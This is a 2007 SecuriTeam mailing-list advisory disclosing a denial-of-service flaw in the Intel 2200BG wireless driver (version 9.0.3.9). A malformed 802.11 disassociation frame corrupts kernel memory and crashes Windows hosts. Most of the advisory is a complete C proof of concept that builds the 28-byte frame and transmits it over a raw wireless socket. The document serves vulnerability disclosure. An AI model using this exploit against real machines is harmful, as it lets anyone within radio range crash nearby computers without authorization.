[EXPL] Intel 2200BG 802.11 Disassociation Packet Kernel Memory Corruption
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 30 Jan 2007 18:30:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Intel 2200BG 802.11 Disassociation Packet Kernel Memory Corruption
------------------------------------------------------------------------
SUMMARY
The Intel wireless mini-pci driver provided with Intel 2200BG cards is
vulnerable to a remote memory corruption flaw. Malformed disassociation
packets can be used to corrupt internal kernel structures, causing a
denial of service (BSOD).
DETAILS
Vulnerable Systems:
* Intel 2200 driver version 9.0.3.9 (09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// 28 bytes disassociation packet.
char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
0x00, 0x00, // Duration ID
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
0x00, 0x00, // Frag. Number
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s;
char packet[sizeof(d)];
int len = 0;
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(packet,sizeof(d));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(packet,d,sizeof(d));
len = sendto(s,packet,sizeof(d), 0, NULL, 0);
usleep(5000);
printf("%d bytes enviados\n",len);
close(s);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:bsilva@xxxxxxxxxx> Breno
Silva Pinto.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] Windows Live Messenger v8 Password Finder
- Next by Date: [NT] Microsoft Agent Heap Overflow Vulnerability
- Previous by thread: [TOOL] Windows Live Messenger v8 Password Finder
- Next by thread: [NT] Microsoft Agent Heap Overflow Vulnerability
- Index(es):
Relevant Pages
|
|
